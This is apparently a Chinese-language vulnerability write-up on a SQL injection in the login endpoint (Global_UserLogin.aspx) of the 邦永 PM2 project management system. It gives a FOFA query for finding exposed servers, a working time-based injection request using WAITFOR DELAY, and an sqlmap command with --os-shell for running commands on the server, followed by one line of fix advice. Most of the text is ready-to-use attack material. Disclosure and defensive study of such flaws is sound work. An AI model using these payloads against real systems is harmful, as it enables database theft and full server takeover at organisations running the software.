0x01 产品简介
邦永PM2项目管理系统科学地将项目管理思想和方法和谐、统一,使得长期以来困扰项目管理工作者的工期、进度、投资和成本情况无法整体动态管理的问题得到了全面而彻底的解决。
0x02 漏洞概述
邦永科技PM2项目管理平台Global_UserLogin.aspx接口处未对用户传入的参数未进行有效的过滤,直接拼接至SQL查询的语句中,导致SQL注入漏洞,攻击者可利用该漏洞获取数据库的敏感信息,深入利用可造成服务器失陷。
0x03 复现环境
FOFA:body="PM2项目管理系统BS版增强工具.zip"
0x04 漏洞复现
PoC
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode=&password=&type= HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0延时5秒
Sqlmap利用
python3 sqlmap.py -u "http://your-ip/Global/Global_UserLogin.aspx?accId=1*&loginCode=&password=&type=" --os-shell命令执行
0x05 修复建议
关闭互联网暴露面或接口设置外部访问权限
升级至安全版本
